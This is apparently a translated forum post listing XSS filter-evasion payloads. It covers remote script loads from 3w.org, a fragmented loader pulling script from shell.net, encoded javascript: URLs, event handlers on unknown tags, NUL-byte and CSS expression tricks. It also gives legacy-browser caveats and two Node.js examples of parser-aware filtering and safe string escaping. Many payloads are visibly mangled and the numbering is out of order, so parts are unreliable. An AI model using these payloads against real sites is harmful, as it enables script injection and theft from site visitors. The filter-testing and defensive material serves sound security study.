(1) Plain XSS: JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

Note on the list that follows: a number of payloads were mangled by the forum's HTML filter when the post was saved (they show up as SRC=\'#\'" /span> or with the scheme cut off). Only the fragments that survived are reproduced; do not copy them expecting them to run.

(99) Alternative alert pop-ups (unknown tags, odd separators, calls without parentheses)
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>
What these rely on: the parser creates an element for any tag name (an HTMLUnknownElement) and event-handler attributes fire on it, so a filter that only knows a list of dangerous tag names is bypassed unless it also controls attributes; a slash can stand in for the space between tag name and attribute; and alert`1` is a tagged-template call that invokes the function with no parentheses, which defeats a filter looking for the string alert(.
(2) IMG tag XSS using a JavaScript URL
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
[the IMG payload did not survive the forum filter; the line repeats (1)]

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, the scheme is case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML character references (with semicolons)
<IMG SRC=javascript:alert("XSS")>
[shown decoded: the forum resolved the &#...; references back to plain text]

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) String.fromCharCode, no quotes needed (generate with an encoder)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) Decimal character references with semicolons (generate with an encoder)
<IMG SRC=jav...omitted...S')>

(9) Zero-padded 7-digit decimal character references, no semicolons (generate with an encoder)
<IMG SRC=jav...omitted...S')>

(10) Hex character references, no semicolons (generate with an encoder)
<IMG SRC=\'#\'" /span>  [mangled by the forum filter]

(11) Embedded tab splitting the scheme
<IMG SRC=\'#\'" ascript:alert('XSS');">  [mangled by the forum filter]

(12) Embedded encoded tab splitting the scheme
<IMG SRC=\'#\'" ascript:alert('XSS');">  [mangled by the forum filter]

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">  [mangled by the forum filter]

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">  [mangled by the forum filter]

(15) Multi-line embedded JavaScript, an extreme example
<IMG SRC=\'#\'" /span>  [mangled by the forum filter]

Two caveats for (3) to (15). First, no current browser executes a javascript: URL in an image source, so these exact payloads are filter test cases, not working exploits; try the same obfuscations in href, iframe src or form action, where javascript: URLs still run. Second, the obfuscations themselves are still valid browser behaviour: the HTML parser decodes numeric character references in attribute values whether or not the trailing semicolon is present (a missing semicolon is only a parse error), and the URL parser strips leading control characters and removes tab, LF and CR from anywhere in the URL. A filter that inspects the raw source text for "javascript:" sees none of these; it has to decode and normalise the value the same way the browser does before checking the scheme.
(16) Working around a length limit (all fragments must land on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
Each injection point only has to hold a few characters. The global z is assembled across the fragments into document.write("<script src=http://www.shell.net/1.js></script>") and the last fragment evaluates it. The closing tag is split as '</sc' + 'ript>' on purpose: a literal </script> inside script text would end the script element early.
(17) Null byte
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null byte 2 (null bytes have basically no effect on sites in China, because there is nowhere to make use of them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
Both depend on old Internet Explorer silently discarding NUL. Under HTML5 tokenization a NUL in a tag name or attribute value is replaced by U+FFFD, so the tag becomes an unknown element and the scheme is no longer "javascript"; neither payload runs in a current browser. They are still worth sending, because a server-side filter that truncates or crashes on NUL is a different bug.

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'" javascript:alert('XSS');">  [mangled by the forum filter]
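To make the decode-then-normalise point concrete, here is an added example that is not part of the original post or of the cheat sheet it translates. It models the two layers a browser applies to an attribute value, HTML character-reference decoding and WHATWG URL normalisation, and compares a raw-text blacklist with a check run on the normalised value, using constructed payloads shaped like items (3) to (14), (17) and (19). It generalises slightly beyond the list by also handling hex references and the NUL-to-U+FFFD rule. All sample strings are constructed for the demo; it runs under Node.js with no dependencies.

```javascript
// Added example, not from the original post. Reproduces the decoding a browser
// applies to an attribute value before it decides whether a URL is javascript:,
// so a filter can test the same normalised string instead of the raw bytes.
// All sample payloads below are constructed for the demo.

// HTML tokenizer view of an attribute value: a raw NUL becomes U+FFFD, and
// numeric character references decode whether decimal (&#106;), hex (&#x6A;),
// zero-padded (&#0000106) or missing the trailing semicolon (a parse error the
// browser recovers from, not a reason to leave the text undecoded).
function decodeAttributeValue(s) {
  return s.replace(/\u0000/g, '\uFFFD')
    .replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (_, num) => {
      const cp = /^x/i.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
      if (cp === 0 || cp > 0x10ffff) return '\uFFFD';
      return String.fromCodePoint(cp);
    });
}

// WHATWG URL parser view: strip leading and trailing C0 controls and space,
// then drop every ASCII tab, LF and CR wherever it appears. This is what makes
// "jav\tascript:" and " &#14; javascript:" equivalent to "javascript:".
function normalizeUrl(s) {
  return s.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '').replace(/[\t\n\r]/g, '');
}

const DANGEROUS_SCHEMES = new Set(['javascript', 'vbscript']);

// The scheme is whatever precedes the first ':' if it is a valid scheme token;
// compare it case-insensitively because JaVaScRiPt: is the same scheme.
function hasDangerousScheme(attrValue) {
  const url = normalizeUrl(decodeAttributeValue(attrValue));
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m !== null && DANGEROUS_SCHEMES.has(m[1].toLowerCase());
}

// The kind of check a blacklist filter typically runs on the raw source text.
function naiveFilterBlocks(attrValue) {
  return /javascript:/i.test(attrValue);
}

// Constructed samples mirroring items (3) to (14) and (19) of the list.
const SAMPLES = [
  ['(3) no quotes',         "javascript:alert('XSS')"],
  ['(4) mixed case',        "JaVaScRiPt:alert('XSS')"],
  ['(5) decimal refs',      '&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)'],
  ['(9) padded, no ;',      '&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert(1)'],
  ['(10) hex, no ;',        '&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert(1)'],
  ['(11) embedded tab',     "jav\tascript:alert('XSS')"],
  ['(12) encoded tab',      "jav&#x09;ascript:alert('XSS')"],
  ['(13) newline',          "jav&#x0A;ascript:alert('XSS')"],
  ['(14) carriage return',  "jav&#x0D;ascript:alert('XSS')"],
  ['(19) leading controls', " &#14;  javascript:alert('XSS');"],
];

// One row per sample: does the naive check fire, does the parser-aware check fire.
function compareFilters() {
  return SAMPLES.map(([label, value]) => ({
    label,
    naive: naiveFilterBlocks(value),
    normalized: hasDangerousScheme(value),
  }));
}

// Items (17)/(18): with HTML5 tokenization the NUL becomes U+FFFD, so the
// scheme token is no longer "javascript" and a current browser will not run it.
// A filter that must also protect legacy IE users would strip NUL instead.
function nulTrickStillWorks() {
  return hasDangerousScheme("java\u0000script:alert('XSS')");
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of compareFilters()) {
    console.log(`${r.label.padEnd(22)} naive=${r.naive}  normalized=${r.normalized}`);
  }
  console.log('NUL-split scheme still dangerous under HTML5 parsing:', nulTrickStillWorks());
}
```

Running it prints one row per sample; the naive check fires only on the three payloads that contain the literal text "javascript:", the normalised check fires on all ten. The design point is that a filter cannot be cleverer than the browser, it has to be the same as the browser, which in production means feeding the markup to a real HTML parser and checking the attribute value the parser produces rather than pattern-matching the source text.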
(20) Non-alphanumeric separator between tag name and attribute
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>  [mangled by the forum filter]

(21) Non-alphanumeric characters 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
This one is an old IE/Gecko quirk: an HTML5 tokenizer keeps the junk as part of the attribute name, so the attribute is not onload and nothing fires.

(22) Non-alphanumeric characters 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>  [mangled by the forum filter]

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and some other browsers)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
With src set, whatever follows up to the next </script> on the page is treated as ignored script content, so the payload does not need to supply the closing tag. The protocol-relative //3w.org form inherits the page's scheme, which matters on HTTPS pages.

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>  [mangled by the forum filter]

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
A regex literal's .source property yields the string "XSS" without any quote character, and the line break serves as the statement terminator, so the payload survives a filter that strips quotes and semicolons.

(29) Escaping the JavaScript escape
\";alert('XSS');//
This targets input placed inside a JavaScript string literal where the application escapes " as \" but leaves backslashes alone. The attacker's \" is rewritten to \\": the first backslash is consumed by the second, the quote closes the string, alert runs as code, and // comments out the remainder of the original statement. Single quotes are used inside the payload because double quotes would be escaped again.
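The break-out in (29) and its fix, as an added example that is not from the original post: a server template that embeds user input in an inline-script string literal, the quote-only escaper the payload defeats, and a serialiser that escapes the backslash as well and neutralises </script>. The template, the variable name and the PWNED marker are constructed for the demo; new Function stands in for the browser executing the script. Runs under Node.js with no dependencies.

```javascript
// Added example, not from the original post. Item (29) targets code that drops
// user input into a JavaScript string literal and "escapes" it by prefixing
// double quotes with a backslash. Because the backslash itself is not escaped,
// the attacker supplies \" so the output contains \\" : the first backslash is
// consumed by the second, and the quote closes the string.

// The broken escaper: only quotes are handled, backslashes pass through.
function naiveEscape(s) {
  return s.replace(/"/g, '\\"');
}

// A correct serialisation: JSON.stringify escapes backslash, quote and control
// characters; the extra replace turns < > / U+2028 U+2029 into \uXXXX so the
// literal cannot close a surrounding <script> block (compare the </TITLE>
// break-out in item (30)) and stays a valid JavaScript string.
function safeJsStringLiteral(s) {
  return JSON.stringify(s).replace(/[<>\/\u2028\u2029]/g,
    c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// A server-side template (constructed for the demo) that embeds a user value in
// inline script. It expects a complete string literal in place of __LITERAL__.
function renderInlineScript(literal) {
  return 'var name = __LITERAL__; return name;'.replace('__LITERAL__', () => literal);
}

// Stand-in for the browser running the inline script. Instead of alert(), the
// payload returns a marker so the effect is observable without a DOM.
function executeScript(code) {
  return new Function(code)();
}

// Constructed payload in the shape of item (29): \" breaks out of the literal,
// the rest runs as code, and // comments out the template's own closing quote.
const PAYLOAD = "\\\";return 'PWNED';//";

// With the quote-only escaper the attacker's code runs and returns the marker.
function vulnerableResult() {
  return executeScript(renderInlineScript('"' + naiveEscape(PAYLOAD) + '"'));
}

// With the JSON-based serialiser the payload comes back as an inert string.
function hardenedResult() {
  return executeScript(renderInlineScript(safeJsStringLiteral(PAYLOAD)));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('naive escaper  ->', JSON.stringify(vulnerableResult()));
  console.log('JSON serialiser ->', JSON.stringify(hardenedResult()));
  console.log('</script> becomes', safeJsStringLiteral('</script>'));
}
```

The first line of output is the string PWNED, meaning attacker-supplied code ran; the second is the payload returned verbatim as data. Escaping must be done for the exact context the value lands in: here that is a JavaScript string inside an HTML script element, which is why both the JavaScript escapes and the angle bracket and slash escapes are needed.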
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
Inside <title> the parser is in RCDATA mode and only </title> gets out of it, so any injection into a page title has to begin by closing the element.

(31) INPUT with TYPE=IMAGE
<INPUT SRC=\'#\'" /span>  [mangled by the forum filter]

(32) BODY BACKGROUND
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag with an event handler
<BODY('XSS')>  [mangled by the forum filter; only the argument survived]

(34) IMG DYNSRC
<IMG DYNSRC=\'#\'" /span>  [mangled by the forum filter]

(35) IMG LOWSRC
<IMG LOWSRC=\'#\'" /span>  [mangled by the forum filter]

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>  [mangled by the forum filter]
BACKGROUND, DYNSRC, LOWSRC and BGSOUND are Internet Explorer and Netscape 4-era features; current browsers ignore them, so (32) to (36) only matter against legacy clients.
(37) STYLE sheet link
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG with a VBScript URL
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS  [mangled by the forum filter]

(41) META refresh to a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC=\'#\'" /IFRAME>  [mangled by the forum filter]

(43) FRAME
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>  [mangled by the forum filter]

(44) TABLE BACKGROUND
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD BACKGROUND
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters inserted before the scheme (any of decimal 1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">  [shown with the inserted characters already decoded away]

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (an open angle bracket followed by a letter is enough to make a tag)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression
expression(alert("XSS"))'>  [mangled by the forum filter; only the tail of the payload survived]

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: a Flash file that carries the XSS can be embedded
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>  [mangled by the forum filter]

Caveats for (37) to (55): CSS expression() only ever existed in Internet Explorer and was dropped from IE8 standards mode onward; javascript: URLs inside CSS url() and in BACKGROUND attributes ran only in old IE and Netscape; <BASE HREF="javascript:..."> works by making every relative script src on the page resolve to a javascript: URL, again only in legacy browsers; and plugin content such as Flash via EMBED is no longer loaded by current browsers. What remains current from this group is the technique: a remote stylesheet (38) or an injected <STYLE> block is still a way to exfiltrate page content through CSS, and any user-controlled value reaching a style attribute or URL-bearing attribute needs context-specific encoding, not a tag blacklist.